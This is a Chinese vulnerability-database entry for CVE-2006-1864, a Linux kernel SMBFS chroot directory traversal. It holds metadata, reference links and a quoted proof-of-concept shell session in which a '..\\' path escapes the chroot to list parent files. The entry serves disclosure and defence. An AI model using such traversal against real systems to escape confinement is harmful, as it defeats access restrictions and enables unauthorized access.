Linux Kernel SMBFS chroot目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110151 漏洞类型 路径遍历
发布时间 2006-04-28 更新时间 2007-01-18
CVE编号 CVE-2006-1864 CNNVD-ID CNNVD-200604-497
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/27766
https://www.securityfocus.com/bid/17735
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-497
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。LinuxKernel的SMBFS加载文件系统中存在输入验证错误,本地攻击者可以利用"..\\"目录遍历序列绕过chroot限制,访问受限资源。
|漏洞EXP
source: http://www.securityfocus.com/bid/17735/info

The Linux Kernel is prone to a vulnerability that allows attackers to bypass a security restriction. This issue is due to a failure in the kernel to properly sanitize user-supplied data.

The problem affects chroot inside of an SMB-mounted filesystem ('smbfs'). A local attacker who is bounded by the chroot can exploit this issue to bypass the chroot restriction and gain unauthorized access to the filesystem.

root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>
|受影响的产品
VMWare ESX Server 2.5.4 VMWare ESX Server 2.5.3 Patch 2 VMWare ESX Server 2.1.3 Patch 1 VMWare ESX Server 2.0.2 Patch 1 Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Lin
|参考资料

来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189435
来源:XF
名称:kernel-smbfs-directory-traversal(26137)
链接:http://xforce.iss.net/xforce/xfdb/26137
来源:www.vmware.com
链接:http://www.vmware.com/download/esx/esx-254-200610-patch.html
来源:www.vmware.com
链接:http://www.vmware.com/download/esx/esx-213-200610-patch.html
来源:www.vmware.com
链接:http://www.vmware.com/download/esx/esx-202-200610-patch.html
来源:UBUNTU
名称:USN-302-1
链接:http://www.ubuntu.com/usn/usn-302-1
来源:TRUSTIX
名称:2006-0026
链接:http://www.trustix.org/errata/2006/0026
来源:BID
名称:17735
链接:http://www.securityfocus.com/bid/17735
来源:BUGTRAQ
名称:20061113VMSA-2006-0008-VMwareESXServer2.0.2UpgradePatch2
链接:http://www.securityfocus.com/archive/1/archive/1/451426/100/200/threaded
来源:BUGTRAQ
名称:20061113VMSA-2006-0005-VMwareESXServer2.5.4UpgradePatch1
链接:http://www.securityfocus.com/archive/1/archive/1/451419/100/200/threaded
来源:BUGTRAQ
名称:20061113VMSA-2006-0007-VMwareESXServer2.1.3UpgradePatch2
链接:http://www.securityf